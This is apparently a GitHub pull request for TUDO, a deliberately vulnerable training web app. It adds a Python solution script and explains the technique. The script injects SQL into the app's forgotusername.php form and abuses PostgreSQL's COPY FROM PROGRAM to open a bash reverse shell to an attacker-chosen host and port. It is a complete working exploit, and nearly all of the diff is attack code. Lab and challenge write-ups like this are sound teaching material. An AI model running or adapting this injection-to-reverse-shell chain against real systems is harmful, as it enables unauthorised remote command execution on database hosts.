### PR TITLE
Unauthenticated RCE using PostgreSQL's "COPY ... FROM PROGRAM 'command'" feature

### DIFF
--- a/README.md
+++ b/README.md
@@ -14,7 +14,7 @@ to complete each step.
 
 1. You must gain access to either user1, or user2's account (2 possible ways)
 2. Next, gain access to the admin account (1 possible ways)
-3. Finally, find a way to remotely execute arbitrary commands (4 possible ways)
+3. Finally, find a way to remotely execute arbitrary commands (5 possible ways)
 
 I would suggest to try and find every way to get the most out of TUDO.
 Bonus: Create a python script which chains together all 3 steps for a complete POC.

--- a/solution/postgres_rce.py
+++ b/solution/postgres_rce.py
@@ -1,0 +1,31 @@
+#!/usr/bin/python3
+
+# @title  TUDO Unauthenticated RCE #5
+# @author rizemon
+# @date   03.02.2023
+
+import sys
+import requests
+
+def execute_revshell_as_postgres_user(target: str, lhost: str, lport: str):
+    url = target + "/forgotusername.php"
+
+    data = {
+        "username": f"""'; DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'echo "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1" | bash'; DROP TABLE IF EXISTS cmd_exec; --"""
+    }
+    requests.post(url, data=data)
+
+def main():
+    if len(sys.argv) != 4:
+        print(f"Usage:   {sys.argv[0]} TARGET            LHOST      LPORT")
+        print(f"Example: {sys.argv[0]} http://172.17.0.2 172.17.0.1 1337")
+        sys.exit(-1)
+
+    target = sys.argv[1]
+    lhost = sys.argv[2]
+    lport = sys.argv[3]
+
+    execute_revshell_as_postgres_user(target, lhost, lport)
+
+if __name__ == "__main__":
+    main()


### PR DESCRIPTION
This PR adds a new PoC which obtains RCE by using PostgreSQL's [COPY ... FROM PROGRAM 'command'](https://www.postgresql.org/docs/current/sql-copy.html) to execute a reverse shell.

The web application utilizes the database credentials of the `postgres` superuser, which has the rights of the `pg_execute_server_program` role that permits the execution of programs on the database host as the user that the database is running as.

Example run:
![image](https://user-images.githubusercontent.com/26685970/216554673-c001054c-058f-4d4f-b441-e61c45d26ef7.png)
![image](https://user-images.githubusercontent.com/26685970/216554743-2049a5bc-38b5-4f28-87de-f476acfaca15.png)

References:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#cve-20199193